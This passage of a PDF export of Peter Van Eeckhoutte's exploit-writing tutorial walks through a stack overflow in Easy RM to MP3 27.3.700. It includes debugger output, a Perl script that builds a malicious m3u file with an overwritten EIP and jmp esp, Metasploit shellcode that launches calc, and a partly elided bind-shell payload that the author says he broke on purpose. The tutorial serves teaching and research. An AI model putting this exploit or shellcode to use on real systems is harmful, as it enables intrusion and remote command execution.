01ccf23c ff8d4e10c744 dec dword ptr <Unloaded_POOL.DRV>+0x44c7104d (44c7104e)[ebp]
01ccf242 2410 and al,10h
01ccf244 ff ???
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 17 / 23
http://www.corelan.be:8800 - Page 18 / 23
01ccf245 ff ???
01ccf246 ff ???
01ccf247 ff ???
01ccf248 e8f3fee4ff call MSRMCcodec02!CTN_WriteHead+0xd320 (01b1f140)
If we now overwrite EIP with 0x01ccf23a, a jmp esp will be executed. Esp contains our
shellcode… so we should now have a working exploit. Let’s test with our “NOP & break”
shellcode :
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x01ccf23a);
$shellcode = $shellcode."\xcc"; #this will cause the application to break, simulating shellcode, but allowing
you to further debug
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
(21c.e54): Break instruction exception - code 80000003 (!!! second chance !!!)
eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=0000662c
eip=000ff745 esp=000ff730 ebp=003440c0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
<Unloaded_P32.dll>+0xff734:
000ff745 cc int 3
0:000> d esp
000ff730 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
000ff740 90 90 90 90 90 cc 90 90-90 90 90 90 90 90 90 90 ................
000ff750 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 00 ................
000ff760 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff770 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff780 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff790 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7a0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
The application now breaks at address 000ff745, which is the location of our first break. So the jmp esp
worked fine (esp started at 000ff730, but it contains NOPs all the way up to 000ff744).
All we need to do now is put in our real shellcode and finalize the exploit.
Get shellcode and finalize the exploit
Metasploit has a nice payload generator that will help you building shellcode. Payloads come
with various options, and (depending on what they need to do), can be small or very large. If you
have a size limitation in terms of buffer space, then you might even want to look at multi-staged
shellcode, or using specifically handcrafted shellcodes such as this one (32byte cmd.exe shellcode
for xp sp2 en). Alternatively, you can split up your shellcode in smaller ‘eggs’ and use a technique
called ‘egg-hunting’ to reassemble the shellcode before executing it
Let’s say we want calc to be executed as our exploit payload, then the shellcode could look like
this :
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 18 / 23
http://www.corelan.be:8800 - Page 19 / 23
#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK :-)
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
First, turn off the autopopup registry setting to prevent the debugger from taking over. Create the
m3u file, open it and watch the application die (and calc should be opened as well).
You could create other shellcode and replace the “launch calc” shellcode with your new shellcode,
but this code may not run well because the shellcode may be bigger, memory locations may be
different, and longer shellcode increases the risk on invalid characters in the shellcode, which need
to be filtered out.
Let’s say we want the exploit bind to a port so a remote hacker could connect and get a command
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 19 / 23
http://www.corelan.be:8800 - Page 20 / 23
line.
As you can see, this shellcode is 344 bytes long (and launching calc only took 144 bytes).
If you just copy&paste this shellcode, you may see that the vulnerable application does not even
crash anymore.
This - most likely - indicates either a problem with the shellcode buffer size (but you can test the
buffer size, you’ll notice that this is not the issue), or we are faced with invalid characters in the
shellcode. You can exclude invalid characters when building the shellcode with metasploit, but
you’ll have to know which characters are allowed and which aren’t. By default, null bytes are
restricted (because they will break the exploit for sure), but what are the other characters ?
The m3u file probably should contain filenames. So a good start would be to filter out all
characters that are not allowed in filenames and filepaths. You could also restrict the character set
altogether by using another decoder. We have used shikata_ga_nai, but perhaps alpha_upper will
work better for filenames. Using another encoded will most likely increase the shellcode length,
but we have already seen (or we can simulate) that size is not a big issue.
Let’s try building a tcp shell bind, using the alpha_upper encoder. We’ll bind a shell to local port
4444. The new shellcode is 703 bytes.
# windows/shell_bind_tcp - 703 bytes
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 20 / 23
http://www.corelan.be:8800 - Page 21 / 23
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
"\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
<...>
"\x50\x41\x41";
Let’s use this shellcode. The new exploit looks like this : P.S. I have manually broken the
shellcode shown here. So if you copy & paste the exploit it will not work. But you should know by
now how to make a working exploit.
#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK :-)
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 21 / 23
http://www.corelan.be:8800 - Page 22 / 23
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Create the m3u file, open it in the application. Easy RM to MP3 now seems to hang :
Pataboom !
Now go out and build your own exploits. Don’t forget to make yourself some nice ascii art, get a
l33t name, and send your greetings to me (corelanc0d3r) :-)
If you want to learn more about writing exploits, you may want to consider taking “
The Exploit Laboratory” class at Blackhat)
(and please send my regards to Saumil and S.K. - “you guys rock!”)
This entry was posted on Sunday, July 19th, 2009 at 8:55 am and is filed under Exploit Writing
Tutorials, Exploits, Security You can follow any responses to this entry through the Comments (RSS)
feed. You can leave a response, or trackback from your own site.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 22 / 23
http://www.corelan.be:8800 - Page 23 / 23
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 23 / 23